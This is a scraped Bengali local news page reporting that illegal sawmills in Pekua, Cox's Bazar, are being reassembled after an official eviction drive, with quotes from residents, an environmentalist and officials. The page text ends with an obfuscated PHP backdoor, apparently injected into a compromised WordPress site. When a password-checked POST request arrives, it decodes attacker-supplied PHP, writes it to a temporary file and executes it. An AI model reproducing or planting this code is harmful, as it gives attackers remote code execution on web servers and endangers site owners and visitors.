• বুধবার, ১৯ জুন ২০২৪, ০৯:৫৪ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

উচ্ছেদেও বন্ধ হচ্ছে না অবৈধ করাতকল

নাজিম উদ্দিন (কুতুবি):পেকুয়া
আপডেট : শুক্রবার, ১৫ ডিসেম্বর, ২০২৩


নাজিম উদ্দীন কুতুবী, পেকুয়া


কক্সবাজারের পেকুয়ায় উচ্ছেদ অভিযানের পরেও বন্ধ করা যাচ্ছে না অবৈধ করাতকল। খুলে নেওয়া যন্ত্রাংশ ফের সংযোজন করে চালুর উপযোগী করা হয়েছে এসব করাতকল।

খোঁজ নিয়ে জানা গেছে, গত ২৩ নভেম্বর উপজেলা প্রশাসন ও বনবিভাগ যৌথভাবে অভিযান চালিয়ে পেকুয়া বাজারের ১০ টি অবৈধ করাতকল উচ্ছেদ করে। জব্দ করা হয় করাতকলের যন্ত্রপাতি ও বিভিন্ন প্রজাতির চোরাই গাছ। এরপর থেকে করাতকল গুলোতে চোরাই গাছ চেরাই বন্ধ থাকলেও সম্প্রতি তা চালুর উদ্যোগ নেয়া হয়েছে।

বুধবার দুপুরে সরেজমিনে দেখা যায়, পেকুয়া বাজারে ইলিয়াসের মালিকানাধীন অবৈধ করাতকলের চাকাসহ যাবতীয় যন্ত্রাংশ ফের লাগানো হচ্ছে। শ্রমিকরা তোড়জোড় দিয়ে কাজ করছে। পেকুয়া বাজার এলাকায় উচ্ছেদ করা প্রতিটি করাতকল চালুর উপযোগী করা হয়েছে।

স্থানীয় বাসিন্দাদের অভিযোগ, সংরক্ষিত বনের চোরাই গাছ চেরাইয়ের জন্য অবৈধভাবে গড়ে ওঠা এসব করাতকল ফের চালুর উদ্যোগ স্থানীয় প্রশাসনের চোখের সামনেই হচ্ছে। কিন্তু তা বন্ধে উদ্যোগ নেয়া হচ্ছে না। করাতকল গুলো ফের চালু করা হলে প্রশাসনের যৌথ অভিযান বিফলে যাবে। গাছ চোর চক্রের শক্তিমত্তা দৃশ্যমান হবে।

পরিবেশবাদী সংগঠনের নেতা মাসউদ বিন জলিল বলেন, পেকুয়ার সংরক্ষিত বন উজাড়ের নেপথ্যের কারণ এসব অবৈধ করাতকল। ছোট্ট এই উপজেলায় ৩০ টি অবৈধ করাতকল স্থাপন করা হয়েছে। বন ও পরিবেশ রক্ষায় প্রশাসনের উচিত এসব করাতকল চিরতরে বন্ধ করা।

এব্যাপারে বারবাকিয়া রেঞ্জ কর্মকর্তা হাবিবুল হক বলেন, সম্প্রতি উপজেলা প্রশাসন ও পুলিশের সহায়তায় আমরা অভিযান চালিয়ে ১৪ টি করাতকল উচ্ছেদ করেছি। করাতকলের মালামাল ও গাছ জব্দ করেছি। এসব ঘটনায় আইনগত ব্যবস্থা নেয়া হয়েছে। ক্রমান্বয়ে সব অবৈধ করাতকল উচ্ছেদ করা হবে। উচ্ছেদ করা করাতকল চালুর চেষ্টা করা হলে প্রয়োজনীয় পদক্ষেপ নেয়া হবে।

পেকুয়া উপজেলার সহকারী কমিশনার (ভূমি) রূম্পা ঘোষ বলেন, উচ্ছেদ করা করাতকল গুলো পূণরায় চালুর খবর আমাদের কাছে নেই। বিষয়টি খোঁজ নেয়া হবে। অবৈধ কোন করাতকল কাউকে চালাতে দেয়া হবে না।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ৯:৫৪)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}